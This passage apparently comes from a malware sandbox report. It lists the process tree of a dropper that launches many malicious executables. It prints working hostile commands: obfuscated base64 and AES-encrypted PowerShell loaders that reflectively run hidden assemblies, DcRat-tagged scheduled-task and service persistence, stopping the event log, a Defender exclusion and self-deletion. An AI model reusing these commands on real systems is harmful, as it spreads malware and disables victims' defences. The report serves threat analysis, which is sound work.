- Checks SCSI registry key(s)
PID:5852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4016 -s 1200
3⤵
- Program crash
PID:4668

C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe
"C:\Users\Admin\AppData\Local\Temp\a\mstsc.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:2092

C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
"C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 632
4⤵
- Program crash
PID:5308

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2092 -s 1144
3⤵
- Program crash
PID:6076

C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_097f1784.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5212

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5212 -s 812
3⤵
- Program crash
PID:6068

C:\Users\Admin\AppData\Local\Temp\a\june.exe
"C:\Users\Admin\AppData\Local\Temp\a\june.exe"
2⤵
- Executes dropped EXE
PID:5676

C:\Users\Admin\AppData\Local\Temp\is-8HKSK.tmp\june.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8HKSK.tmp\june.tmp" /SL5="$E0200,3573915,54272,C:\Users\Admin\AppData\Local\Temp\a\june.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5784

C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -i
4⤵
- Executes dropped EXE
PID:5316

C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe
"C:\Users\Admin\AppData\Local\Sun Vox\sunvox32.exe" -s
4⤵
- Executes dropped EXE
PID:5592

C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_33cb9091.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6132

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 804
3⤵
- Program crash
PID:6060

C:\Users\Admin\AppData\Local\Temp\a\new.exe
"C:\Users\Admin\AppData\Local\Temp\a\new.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5884

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5992

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5428

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:6100

C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe
"C:\Users\Admin\AppData\Local\Temp\a\ttt01.exe"
2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:4248

C:\Users\Admin\AppData\Local\Temp\a\123p.exe
"C:\Users\Admin\AppData\Local\Temp\a\123p.exe"
2⤵
- Executes dropped EXE
PID:3296

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5424

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5392

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6008

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "OBGPQMHF"
3⤵
- Launches sc.exe
PID:1848

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "OBGPQMHF" binpath= "C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe" start= "auto"
3⤵
- Launches sc.exe
PID:2416

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
3⤵
- Launches sc.exe
PID:4884

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "OBGPQMHF"
3⤵
- Launches sc.exe
PID:4424

C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe
"C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe"
2⤵
- Executes dropped EXE
- Modifies registry class
PID:2880

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\BlockComponentwebMonitordhcp\AbAw8xfGFsmxdxvuwvbKubDJeV.vbe"
3⤵
PID:1740

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\BlockComponentwebMonitordhcp\8H5kf2bUK2r.bat" "
4⤵
PID:2160

C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe
"C:\BlockComponentwebMonitordhcp\agentDllDhcp.exe"
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:6112

C:\Program Files\Internet Explorer\SIGNUP\System.exe
"C:\Program Files\Internet Explorer\SIGNUP\System.exe"
6⤵
PID:5568

C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"
2⤵
- Executes dropped EXE
PID:5868

C:\Users\Admin\AppData\Local\Temp\u4j0.0.exe
"C:\Users\Admin\AppData\Local\Temp\u4j0.0.exe"
3⤵
- Executes dropped EXE
PID:5748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 1100
4⤵
- Program crash
PID:5288

C:\Users\Admin\AppData\Local\Temp\u4j0.1.exe
"C:\Users\Admin\AppData\Local\Temp\u4j0.1.exe"
3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1528
3⤵
- Program crash
PID:1960

C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe
"C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2180

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
3⤵
PID:1012

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"
3⤵
PID:1896

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
3⤵
PID:3960

C:\Windows\system32\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f
4⤵
- DcRat
- Creates scheduled task(s)
PID:3416

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"
3⤵
PID:4268

C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe
"C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3592

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f
3⤵
- DcRat
- Creates scheduled task(s)
PID:1424

C:\Users\Admin\AppData\Local\Temp\a\crypt.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"
2⤵
- Executes dropped EXE
PID:1908

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
3⤵
PID:5072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
4⤵
PID:5672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"
5⤵
PID:4736

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"
5⤵
- Drops startup file
- Suspicious use of SetThreadContext
PID:5608

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:1120

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:5912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
PID:5948

C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe
"C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"
2⤵
PID:1104

C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe
"C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3220

C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"
2⤵
- Suspicious use of SetThreadContext
PID:6076

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2584

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6076 -s 832
3⤵
- Program crash
PID:5584

C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe
"C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"
2⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\ckz_O3HM\nds.exe
"C:\Users\Admin\AppData\Local\Temp\ckz_O3HM\nds.exe"
3⤵
PID:1788

C:\Users\Admin\AppData\Local\Temp\ckz_O3HM\nds.exe
"C:\Users\Admin\AppData\Local\Temp\ckz_O3HM\nds.exe"
4⤵
- Modifies WinLogon for persistence
- Loads dropped DLL
PID:4936

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill.exe /F /IM nvidia.exe
5⤵
PID:3504

C:\Users\Admin\AppData\Local\Temp\a\garits.exe
"C:\Users\Admin\AppData\Local\Temp\a\garits.exe"
2⤵
- UAC bypass
- System policy modification
PID:1352

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\garits.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\garits.exe' -Force
3⤵
- Drops startup file
PID:5712

C:\Users\Admin\AppData\Local\Temp\a\current.exe
"C:\Users\Admin\AppData\Local\Temp\a\current.exe"
2⤵
PID:4612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 412
3⤵
- Program crash
PID:5092

C:\Users\Admin\AppData\Local\Temp\a\test.exe
"C:\Users\Admin\AppData\Local\Temp\a\test.exe"
2⤵
PID:3048

C:\Users\Admin\AppData\Local\Temp\a\123.exe
"C:\Users\Admin\AppData\Local\Temp\a\123.exe"
2⤵
PID:5880

C:\Users\Admin\AppData\Local\Temp\a\sarra.exe
"C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5476

C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe
"C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe"
2⤵
PID:5628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp48DE.tmp.bat" "
3⤵
PID:4620

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\tmp48DE.tmp.bat"
4⤵
PID:3912

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\tmp48DE.tmp.bat';$IKhK='MahibHihibHnhibHModhibHulhibHehibH'.Replace('hibH', ''),'GetQgnnCuQgnnrrQgnneQgnnntPQgnnroQgnnceQgnnsQgnnsQgnn'.Replace('Qgnn', ''),'EleVKaqmVKaqeVKaqntVKaqAtVKaq'.Replace('VKaq', ''),'ReaXrSRdLiXrSRnXrSResXrSR'.Replace('XrSR', ''),'DeDwcdcDwcdomDwcdpDwcdreDwcdsDwcdsDwcd'.Replace('Dwcd', ''),'CVrqZreaVrqZtVrqZeVrqZDVrqZecVrqZryVrqZptoVrqZrVrqZ'.Replace('VrqZ', ''),'ChXNvfaXNvfnXNvfgXNvfeEXNvfxteXNvfnsXNvfiXNvfonXNvf'.Replace('XNvf', ''),'SpHdEMlitHdEM'.Replace('HdEM', ''),'EnFMIKtFMIKryFMIKPFMIKoiFMIKntFMIK'.Replace('FMIK', ''),'CCPxDopCPxDyCPxDToCPxD'.Replace('CPxD', ''),'InLeisvLeisokLeiseLeis'.Replace('Leis', ''),'TzEulranzEulszEulfzEulorzEulmzEulFzEulinzEulazEullBzEullozEulckzEul'.Replace('zEul', ''),'LMYvEoMYvEaMYvEdMYvE'.Replace('MYvE', ''),'FrgPovomgPovBgPovagPovsgPove64gPovStgPovrgPovigPovnggPov'.Replace('gPov', '');powershell -w hidden;function Wjvpz($DSMeA){$LRUPP=[System.Security.Cryptography.Aes]::Create();$LRUPP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LRUPP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LRUPP.Key=[System.Convert]::($IKhK[13])('hbO8R88HBl6x9E1ChjrqAUcnoAC3B8p99JSIvXSwQuY=');$LRUPP.IV=[System.Convert]::($IKhK[13])('5zVFVvVJKQyl6Cns03Obiw==');$folEv=$LRUPP.($IKhK[5])();$SLWGx=$folEv.($IKhK[11])($DSMeA,0,$DSMeA.Length);$folEv.Dispose();$LRUPP.Dispose();$SLWGx;}function TImJD($DSMeA){$gpnDG=New-Object System.IO.MemoryStream(,$DSMeA);$hLGlZ=New-Object System.IO.MemoryStream;$KsXZc=New-Object System.IO.Compression.GZipStream($gpnDG,[IO.Compression.CompressionMode]::($IKhK[4]));$KsXZc.($IKhK[9])($hLGlZ);$KsXZc.Dispose();$gpnDG.Dispose();$hLGlZ.Dispose();$hLGlZ.ToArray();}$Ewgsd=[System.IO.File]::($IKhK[3])([Console]::Title);$WuYWe=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 5).Substring(2))));$NZPxf=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 6).Substring(2))));[System.Reflection.Assembly]::($IKhK[12])([byte[]]$NZPxf).($IKhK[8]).($IKhK[10])($null,$null);[System.Reflection.Assembly]::($IKhK[12])([byte[]]$WuYWe).($IKhK[8]).($IKhK[10])($null,$null); "
5⤵
PID:2860

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
5⤵
PID:3368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
PID:3844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\tmp48DE.tmp')
6⤵
PID:5080

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 36344' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network36344Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
6⤵
PID:7076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7076 -s 2052
7⤵
- Program crash
PID:7740

C:\Users\Admin\AppData\Local\Temp\a\Locker.exe
"C:\Users\Admin\AppData\Local\Temp\a\Locker.exe"
2⤵
- Adds Run key to start application
PID:4204

C:\Users\Admin\AppData\Local\Temp\a\eeee.exe
"C:\Users\Admin\AppData\Local\Temp\a\eeee.exe"
2⤵
- Writes to the Master Boot Record (MBR)
PID:1652

C:\Users\Admin\AppData\Local\Temp\a\inte.exe
"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
2⤵
- Suspicious use of SetThreadContext
PID:1712

C:\Users\Admin\AppData\Local\Temp\a\inte.exe
"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
3⤵
PID:4172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit
4⤵
PID:1164

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "inte.exe" /f
5⤵
- Kills process with taskkill
PID:3004

C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe
"C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe"
2⤵
PID:3508

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f
3⤵
- DcRat
- Creates scheduled task(s)
PID:3328

C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe
"C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe"
2⤵
- Suspicious use of SetThreadContext
PID:4912

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:5944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 864
3⤵
- Program crash
PID:5528

C:\Users\Admin\AppData\Local\Temp\a\Akh.exe
"C:\Users\Admin\AppData\Local\Temp\a\Akh.exe"
2⤵
- Suspicious use of SetThreadContext
PID:5128

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
3⤵
PID:3124

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
3⤵
- Drops startup file
PID:2208

C:\Users\Admin\Pictures\fU9NBzdCm8tNVX4fcePhj2s5.exe
"C:\Users\Admin\Pictures\fU9NBzdCm8tNVX4fcePhj2s5.exe"
4⤵
PID:3924

C:\Users\Admin\AppData\Local\Temp\u310.0.exe
"C:\Users\Admin\AppData\Local\Temp\u310.0.exe"
5⤵
PID:4360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4360 -s 1276
6⤵
- Program crash
PID:6452

C:\Users\Admin\AppData\Local\Temp\u310.1.exe
"C:\Users\Admin\AppData\Local\Temp\u310.1.exe"
5⤵
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 1168
5⤵
- Program crash
PID:4752

C:\Users\Admin\Pictures\nVXa3fRBQ8LFIRuFLhFh2yDj.exe
"C:\Users\Admin\Pictures\nVXa3fRBQ8LFIRuFLhFh2yDj.exe"
4⤵
PID:5744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:4776

C:\Users\Admin\Pictures\7DC6A5GDrFxha2FYCN0bmhQa.exe
"C:\Users\Admin\Pictures\7DC6A5GDrFxha2FYCN0bmhQa.exe"
4⤵
PID:5968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
PID:6288

C:\Users\Admin\Pictures\LfieJN6ZDcXxWF1r2CC19uMl.exe
"C:\Users\Admin\Pictures\LfieJN6ZDcXxWF1r2CC19uMl.exe" --silent --allusers=0
4⤵
PID:5656

C:\Users\Admin\Pictures\LfieJN6ZDcXxWF1r2CC19uMl.exe
C:\Users\Admin\Pictures\LfieJN6ZDcXxWF1r2CC19uMl.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.38 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x6a8ee1d0,0x6a8ee1dc,0x6a8ee1e8
5⤵
PID:4240

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LfieJN6ZDcXxWF1r2CC19uMl.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\LfieJN6ZDcXxWF1r2CC19uMl.exe" --version
5⤵
PID:1340

C:\Users\Admin\Pictures\LfieJN6ZDcXxWF1r2CC19uMl.exe
"C:\Users\Admin\Pictures\LfieJN6ZDcXxWF1r2CC19uMl.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=5656 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240409202535" 